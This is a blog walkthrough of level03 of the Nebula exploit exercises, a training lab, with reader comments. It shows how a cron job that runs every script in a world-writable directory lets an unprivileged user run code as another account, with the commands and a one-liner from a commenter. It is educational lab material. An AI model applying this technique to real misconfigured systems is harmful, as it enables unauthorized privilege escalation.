Nebula exploit exercises walkthrough – level03

level03

Check the home directory of flag03 and take note of the files there.

There is a crontab that is called every couple of minutes.

cron is a utility used to run tasks periodically, found in nearly every distro.

In /home/flag03, we have a script – writable.sh – and a directory – writable.d.

level03@nebula:/home/flag03$ ls -sl
total 1
0 drwxrwxrwx 1 flag03 flag03 40 2014-06-03 03:39 writable.d
1 -rwxr-xr-x 1 flag03 flag03 98 2011-11-20 21:22 writable.sh

Let’s take a look at writable.sh:

#!/bin/sh

for i in /home/flag03/writable.d/* ; do
	(ulimit -t 5; bash -x "$i")
	rm -f "$i"
done

This is fairly simple – for each file in the writable.d directory, execute the scripts contained within, and then delete them. bash -x runs the script in a trace mode, to give you a bit more detail about when it is running. I think we can ignore ulimit -t 5 – it just limits the CPU time available to the shell, possibly to stop a malicious script consuming excess resources.

Note that the writable.d directory is world read/write – so we can just put a script in there:

level03@nebula:~$ cat getflag.sh 
#!/bin/sh

/bin/getflag >> /tmp/flag03.out
level03@nebula:~$ cp getflag.sh /home/flag03/writable.d/

Then wait a short while, assuming that the writable.sh script is the one being run by cron…

level03@nebula:/tmp$ ls -sl
total 4
4 -rw-rw-r-- 1 flag03 flag03 59 2014-06-04 09:39 flag03.out
level03@nebula:/tmp$ cat flag03.out 
You have successfully executed getflag on a target account

Aside

Now – this is all well and good, but if we weren’t told that the script was run by cron, what could we do?

There is a root user in the Nebula VM, and using that I can do:

nebula@nebula:/var/spool/cron$ sudo crontab -u flag03 -l
*/3 * * * * /home/flag03/writable.sh

But I can’t do that as level03:

level03@nebula:/tmp$ crontab -u flag03 -l
must be privileged to use -u

Also, I could use ps to see that the process runs, but that would presume that I knew it was cron’ed anyway.

So, not sure how I would go about finding cron jobs as an unprivileged user.

I’ve asked on the Unix Stack Exchange.

7 thoughts on “Nebula exploit exercises walkthrough – level03

  1. Permalink  ⋅ Reply

    lollipoponlips

    October 16, 2016 at 9:18pm

    I’ve just started to do these exercises. I’m cofused:

    1) what is the objective exactly?

  2. […] the cleanest, but it works to get the flag. I had the same thought as Cybergibbons though, (see this article) and from what I see of his findings, the only way to detect cronjobs if you don’t have […]

  3. Permalink  ⋅ Reply

    Shinko

    May 6, 2017 at 12:47am

    For fun, I decided to try and one-Liner it:
    echo -e ‘#!/usr/bin/bashnn/bin/getflag>/home/flag03/got_result.txtn’>/home/flag03/writable.d/get_flag.sh;chmod +x /home/flag03/writable.d/get_flag.sh

  4. Permalink  ⋅ Reply

    emily

    November 18, 2017 at 12:30am

    level03@nebula:~$ cat getfile.sh
    level03@nebula:~$ cat: getflag.sh: No such file or directory

    ??

  5. Permalink  ⋅ Reply

    emily

    November 18, 2017 at 12:32am

    level03@nebula:~$ cat getflag.sh
    level03@nebula:~$ cat: getflag.sh: No such file or directory.

    What am I doing wrong?

    • Permalink  ⋅ Reply

      evan

      December 27, 2017 at 5:23pm

      did you create the getflag.sh script and is it located in your home directory?

    • Permalink  ⋅ Reply

      manuelh

      March 29, 2018 at 7:56pm

      Try the following:
      level03@nebula:~$ cat > getflag.sh
      #!/bin/sh

      /bin/getflag >> /tmp/flag03.out

      level03@nebula:~$ cp getflag.sh /home/flag03/writable.d/

Leave a Reply

Your email will not be published. Name and Email fields are required.

This site uses Akismet to reduce spam. Learn how your comment data is processed.